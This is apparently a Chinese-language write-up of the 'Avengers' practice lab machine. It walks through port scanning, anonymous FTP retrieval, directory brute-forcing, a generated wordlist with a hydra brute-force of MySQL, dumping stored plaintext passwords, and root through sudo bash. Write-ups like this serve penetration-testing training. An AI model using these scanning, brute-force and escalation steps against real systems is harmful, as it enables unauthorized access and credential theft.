Avengers

image

信息搜集

192.168.100.26

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
┌──(root㉿Eecho)-[~]
└─# rustscan -a 192.168.100.26 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.26:21
Open 192.168.100.26:22
Open 192.168.100.26:80
Open 192.168.100.26:3306
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.100.26
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-27 20:33 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:33
Completed NSE at 20:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:33
Completed NSE at 20:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:33
Completed NSE at 20:33, 0.00s elapsed
Initiating ARP Ping Scan at 20:33
Scanning 192.168.100.26 [1 port]
Completed ARP Ping Scan at 20:33, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:33
Completed Parallel DNS resolution of 1 host. at 20:33, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 20:33
Scanning 192.168.100.26 [4 ports]
Discovered open port 22/tcp on 192.168.100.26
Discovered open port 3306/tcp on 192.168.100.26
Discovered open port 21/tcp on 192.168.100.26
Discovered open port 80/tcp on 192.168.100.26
Completed SYN Stealth Scan at 20:33, 0.02s elapsed (4 total ports)
Initiating Service scan at 20:33
Scanning 4 services on 192.168.100.26
Completed Service scan at 20:33, 6.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.100.26
Retrying OS detection (try #2) against 192.168.100.26
NSE: Script scanning 192.168.100.26.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:33
NSE: [ftp-bounce 192.168.100.26:21] PORT response: 500 Illegal PORT command.
Completed NSE at 20:33, 5.05s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:33
Completed NSE at 20:33, 1.16s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:33
Completed NSE at 20:33, 0.00s elapsed
Nmap scan report for 192.168.100.26
Host is up, received arp-response (0.00062s latency).
Scanned at 2026-04-27 20:33:36 CST for 16s

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.100.49
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 6f:85:17:02:1a:9d:94:c3:b3:4e:92:4b:05:3a:96:a2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFH3e9eFcn6NgTzFDVe34ENw0HUar9MKorDob6Sl67OtpAREgJ9nKCLnsmc40IXGyTHK8JCRzm/99IrAaYUlmsU=
| 256 57:6b:d4:59:bd:3b:b5:c0:3f:1b:7e:c0:b9:9a:69:6d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA1uDnVLGrgbMyCdJFDMfHug36c+TsWO4aZDvhhaJ2hX
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Avengers Hacking \xC3\x89tico
| http-robots.txt: 2 disallowed entries
|_/webs/ /mysql/
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.52 (Ubuntu)
3306/tcp open mysql syn-ack ttl 64 MySQL 8.0.36-0ubuntu0.22.04.1
|_ssl-date: TLS randomness does not represent time
| mysql-info:
| Protocol: 10
| Version: 8.0.36-0ubuntu0.22.04.1
| Thread ID: 10
| Capabilities flags: 65535
| Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, DontAllowDatabaseTableColumn, SupportsCompression, Speaks41ProtocolOld, FoundRows, SupportsLoadDataLocal, SupportsTransactions, IgnoreSigpipes, InteractiveClient, SwitchToSSLAfterHandshake, ConnectWithDatabase, Speaks41ProtocolNew, ODBCClient, LongColumnFlag, LongPassword, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: h\x01\x0FPy\x0D\x15OL\x01\x198Vd/CjO=G
|_ Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.36_Auto_Generated_Server_Certificate
| Issuer: commonName=MySQL_Server_8.0.36_Auto_Generated_CA_Certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-21T19:56:11
| Not valid after: 2034-03-19T19:56:11
| MD5: 31c2 34b7 fd11 cd8d 5d75 20f9 6e1f 5e35
| SHA-1: 0be4 ee3d 3a42 0fec 2d2e fa11 bf2f 11ad f3c6 1e45
| SHA-256: 456c 0217 3712 1519 a328 fe3a 4194 9927 7c57 baa5 6548 545f cab9 42d3 3803 c90b
| -----BEGIN CERTIFICATE-----
| MIIDBzCCAe+gAwIBAgIBAjANBgkqhkiG9w0BAQsFADA8MTowOAYDVQQDDDFNeVNR
| TF9TZXJ2ZXJfOC4wLjM2X0F1dG9fR2VuZXJhdGVkX0NBX0NlcnRpZmljYXRlMB4X
| DTI0MDMyMTE5NTYxMVoXDTM0MDMxOTE5NTYxMVowQDE+MDwGA1UEAww1TXlTUUxf
| U2VydmVyXzguMC4zNl9BdXRvX0dlbmVyYXRlZF9TZXJ2ZXJfQ2VydGlmaWNhdGUw
| ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDD7za/n3kucdyJn5mfyoEb
| t5PMC2NSLyIHruWwSYQCtez59R8YohG4zGmVuKm3qsZWCb1pX7jx79f1/tYHBdoA
| mfvddla0b+r1ur/dLH9gLf/7OX99BAf0QPKk7KSymqUqoImrURoSx6rZRI4Zfjrv
| oW5kyTPSwVrty0JTFqx+V7ECRI1ruUANxWiZ36/k/sLT5ddUEpr/Iqq4Jv6k6Pon
| keBo+PJbsVz9K+hHCa4nXjgN0MdQIDNKHjo1fOHKRImfcYc20grTqw6hQEkrlJbp
| oUTNTWZGTw0uy17ER7vXW68BV83S005jKKudWjd6QQPfjEkKP8aLu3WyJCnR/toR
| AgMBAAGjEDAOMAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggEBAFFrFmfh
| zk7kF2N2/b+2am927bccknPeGXA8vfgj8ldyuhqrUhRDsMZHg9Dn0SVQbU1JMWQs
| ql/meoWAtjsXSQa4lNbi10zNG7xmuz5K+3Z+TEGJDyQM5olU4tXw5Fhjp+1MhISd
| xwGfgXIN6rvAIRFYooQjaRAV4z95EOWV2VsZOOaJv7cNq4IA0T6aygM8flQ8pNhT
| jFTKvIaGZHwYSLIDSKXlApdivUvninHDBK9MQkkCHuHEMfu+5ve+NRcHz/K9B/kY
| h8dbSRPxp8V2HsJT4UbmPJ0b1miFTfZX/9PuAqlmNR5ka2XapUf1yutPJ1Vh9gS1
| WWHk508Cj72qdUI=
|_-----END CERTIFICATE-----
MAC Address: 08:00:27:DD:26:CB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 4.19 (97%), Linux 5.0 - 5.14 (97%), OpenWrt 21.02 (Linux 5.4) (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (97%), Linux 6.0 (95%), Linux 6.15 (94%), Linux 5.4 - 5.10 (91%), Linux 2.6.32 (91%), Linux 2.6.32 - 3.13 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.99%E=4%D=4/27%OT=21%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=69EF57B0%P=x86_64-pc-linux-gnu)
SEQ(SP=100%GCD=1%ISR=10B%TI=Z%II=I%TS=A)
SEQ(SP=108%GCD=1%ISR=109%TI=Z%II=I%TS=A)
OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 26.668 days (since Wed Apr 1 04:32:23 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.100.26

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:33
Completed NSE at 20:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:33
Completed NSE at 20:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:33
Completed NSE at 20:33, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.85 seconds
Raw packets sent: 73 (6.808KB) | Rcvd: 25 (1.752KB)

  • 21 FTP
  • 22 SSH
  • 80 HTTP
  • 3306 MYSQL

FTP枚举

前面rustscan扫描的时候已经发现FTP存在匿名登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root㉿Eecho)-[~]
└─# ftp 192.168.100.26
Connected to 192.168.100.26.
220 Welcome to blah FTP service.
Name (192.168.100.26:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
550 Permission denied.
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 459 Mar 24 2024 FLAG.txt
-rw-r--r-- 1 0 0 417 Mar 24 2024 credential_mysql.txt.zip
226 Directory send OK.
ftp> get credential_mysql.txt.zip
local: credential_mysql.txt.zip remote: credential_mysql.txt.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for credential_mysql.txt.zip (417 bytes).
100% |*******************************************************************************************************************************************| 417 221.67 KiB/s 00:00 ETA
226 Transfer complete.
417 bytes received in 00:00 (141.25 KiB/s)
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (459 bytes).
100% |*******************************************************************************************************************************************| 459 160.77 KiB/s 00:00 ETA
226 Transfer complete.
459 bytes received in 00:00 (135.78 KiB/s)
ftp> ^D
221 Goodbye.
1
2
3
4
┌──(root㉿Eecho)-[~]
└─# unzip credential_mysql.txt.zip
Archive: credential_mysql.txt.zip
[credential_mysql.txt.zip] credential_mysql.txt password:

解压需要密码.

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿Eecho)-[~]
└─# gobuster dir -u http://192.168.100.26/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,back
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.26/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: php,txt,html,back
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 1105]
php (Status: 301) [Size: 314] [--> http://192.168.100.26/php/]
flags (Status: 301) [Size: 316] [--> http://192.168.100.26/flags/]
code (Status: 301) [Size: 315] [--> http://192.168.100.26/code/]
css (Status: 301) [Size: 314] [--> http://192.168.100.26/css/]
mysql (Status: 301) [Size: 316] [--> http://192.168.100.26/mysql/]
robots.txt (Status: 200) [Size: 49]
webs (Status: 301) [Size: 315] [--> http://192.168.100.26/webs/]
server-status (Status: 403) [Size: 279]

image

在/mysql/database.html下面源码中发现了密码

image

需要base64多次解密

image

尝试在/webs/secret.html搜索

image

给出了用户名hulk

ssh登录hulk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(root㉿Eecho)-[~]
└─# ssh hulk@192.168.100.26
The authenticity of host '192.168.100.26 (192.168.100.26)' can't be established.
ED25519 key fingerprint is: SHA256:s6G+7efRROGJbKRWDDRl1EdtY5tigLKM78WVXg9bdbY
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.100.26' (ED25519) to the list of known hosts.
hulk@192.168.100.26's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of jue 15 ago 2024 16:02:07 UTC

System load: 0.58349609375 Processes: 110
Usage of /: 57.7% of 9.75GB Users logged in: 0
Memory usage: 28% IPv4 address for enp0s3: 192.168.18.147
Swap usage: 0%


El mantenimiento de seguridad expandido para Applications está desactivado

Se pueden aplicar 11 actualizaciones de forma inmediata.
Para ver estas actualizaciones adicionales, ejecute: apt list --upgradable

Active ESM Apps para recibir futuras actualizaciones de seguridad adicionales.
Vea https://ubuntu.com/esm o ejecute «sudo pro status»


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu Aug 15 16:02:08 2024 from 192.168.18.153
hulk@TheHackersLabs-Avengers:~$ id
uid=1002(hulk) gid=1002(hulk) groups=1002(hulk)
hulk@TheHackersLabs-Avengers:~$

提权

横向移动到stif

在hulk家目录下/mysql/hint/zip/shit_how_they_did_know_this_password.txt给出了压缩包的密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
hulk@TheHackersLabs-Avengers:~/mysql/hint/zip$ cat shit_how_they_did_know_this_password.txt
###
##
## ## ## ## ##### ###### ##
####### ## ## ## ## ## ##
## # ## ## ## ##### ## ## ##
## ## ##### ## ##### ##
## ## ## ###### ## ####
##### ####


Congratulations, you found the password to decrypt the compressed FTP .zip file

Now you know what to do with this... I guess

password: (You thought I would give you the password so quickly, because if you look closely at the file you would see the password more clearly...)

密码就是 shit_how_they_did_know_this_password

解压credential_mysql.txt.zip

image

数据库的密码fuerzabrutaXXXX后四位未知但是知道是0-3000之间

1
2
3
4
with open("passwords.txt", "w") as f:
for i in range(0, 3001):
pwd = f"fuerzabruta{i:04d}"
f.write(pwd + "\n")

hydra爆破mysql密码

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# hydra -l hulk -P passwords.txt mysql://192.168.100.26
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-04-27 20:58:37
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 3001 login tries (l:1/p:3001), ~751 tries per task
[DATA] attacking mysql://192.168.100.26:3306/
[3306][mysql] host: 192.168.100.26 login: hulk password: fuerzabruta2024
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-04-27 20:58:53

登录mysql

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
hulk@TheHackersLabs-Avengers:~/mysql/hint/zip$ mysql -uhulk -pfuerzabruta2024
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4075
Server version: 8.0.36-0ubuntu0.22.04.1 (Ubuntu)

Copyright (c) 2000, 2024, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| db_flag |
| db_true |
| information_schema |
| mysql |
| no_db |
| performance_schema |
| sys |
+--------------------+
7 rows in set (0,00 sec)

mysql> use no_db;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------+
| Tables_in_no_db |
+-----------------+
| passwords |
| users |
+-----------------+
2 rows in set (0,00 sec)

mysql> select * from users;
+----+--------+---------------+
| id | user | password |
+----+--------+---------------+
| 1 | stif | escudoamerica |
| 2 | hulk | fuerza***** |
| 3 | antman | ****** |
| 4 | thanos | NOPASSWD |
+----+--------+---------------+
4 rows in set (0,00 sec)

mysql>

获取到了stif用户凭证

1
2
3
4
5
hulk@TheHackersLabs-Avengers:~/mysql/hint/zip$ su stif
Password:
stif@TheHackersLabs-Avengers:/home/hulk/mysql/hint/zip$ id
uid=1001(stif) gid=1001(stif) groups=1001(stif)
stif@TheHackersLabs-Avengers:/home/hulk/mysql/hint/zip$

stif -> root

存在sudo bash提权

1
2
3
4
5
6
7
8
9
10
11
stif@TheHackersLabs-Avengers:/home/hulk/mysql/hint/zip$ sudo -l
Matching Defaults entries for stif on TheHackersLabs-Avengers:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User stif may run the following commands on TheHackersLabs-Avengers:
(ALL : ALL) NOPASSWD: /usr/bin/bash
(ALL : ALL) NOPASSWD: /usr/bin/unzip
stif@TheHackersLabs-Avengers:/home/hulk/mysql/hint/zip$ sudo /usr/bin/bash
root@TheHackersLabs-Avengers:/home/hulk/mysql/hint/zip# id
uid=0(root) gid=0(root) groups=0(root)
root@TheHackersLabs-Avengers:/home/hulk/mysql/hint/zip#